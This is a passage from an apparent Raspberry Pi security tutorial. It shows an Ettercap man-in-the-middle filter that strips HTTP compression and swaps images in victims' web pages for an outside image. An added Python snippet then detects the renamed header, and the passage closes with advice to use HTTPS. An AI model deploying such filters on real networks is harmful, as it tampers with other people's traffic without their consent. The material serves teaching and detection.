Pushing unexpected images to browser windows
Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes by, we also have the option of modifying the packets before we pass them on to their rightful owner. To manipulate packet contents with Ettercap, we will first need to build some filter code in nano:
pi@raspberrypi ~ $ nano myfilter.ecf
The following is our filter code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Mischief");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "<img")) {
      replace("src=", "src=\"http://www.intestinate.com/tux.png\" alt=");
      msg("Mischief Managed!\n");
   }
}
The first block looks for any TCP packets with a destination of port 80, that is, packets that a web browser sends to a web server to request pages. The filter then peeks inside...
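Seen from the web server or a reverse proxy, the first block leaves a recognisable trace: the request arrives with no Accept-Encoding header but with an unknown Accept-* header that still carries a list of content codings. The following check for that pattern is an added example, not code from the original text; the function names, the list of known headers and codings, and the two sample requests are constructed for illustration.

```python
# Added example: header names, coding list and sample requests are constructed.
KNOWN_ACCEPT = {"accept", "accept-charset", "accept-encoding",
                "accept-language", "accept-datetime"}
CODINGS = {"gzip", "deflate", "br", "zstd", "compress", "identity", "*"}


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Return (name, value) pairs from the header block of a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def rewritten_accept_encoding(raw: bytes) -> list[str]:
    """Names of headers that look like a renamed Accept-Encoding."""
    headers = parse_headers(raw)
    if any(n.lower() == "accept-encoding" for n, _ in headers):
        return []                             # header intact, nothing to flag
    hits = []
    for name, value in headers:
        lname = name.lower()
        if not lname.startswith("accept-") or lname in KNOWN_ACCEPT:
            continue
        # A value made only of content-coding tokens under an unknown
        # Accept-* name is what the rename in the filter leaves behind.
        tokens = {t.split(";")[0].strip().lower() for t in value.split(",")}
        if tokens and tokens <= CODINGS:
            hits.append(name)
    return hits


TAMPERED = (b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
            b"Accept: text/html\r\nAccept-Mischief: gzip, deflate\r\n\r\n")
CLEAN = (b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
         b"Accept: text/html\r\nAccept-Encoding: gzip;q=1.0, br\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("tampered", TAMPERED), ("clean", CLEAN)):
        print(label, rewritten_accept_encoding(req))
```

This only helps on plain HTTP; serving the site over HTTPS keeps an on-path filter from reading or rewriting either direction in the first place.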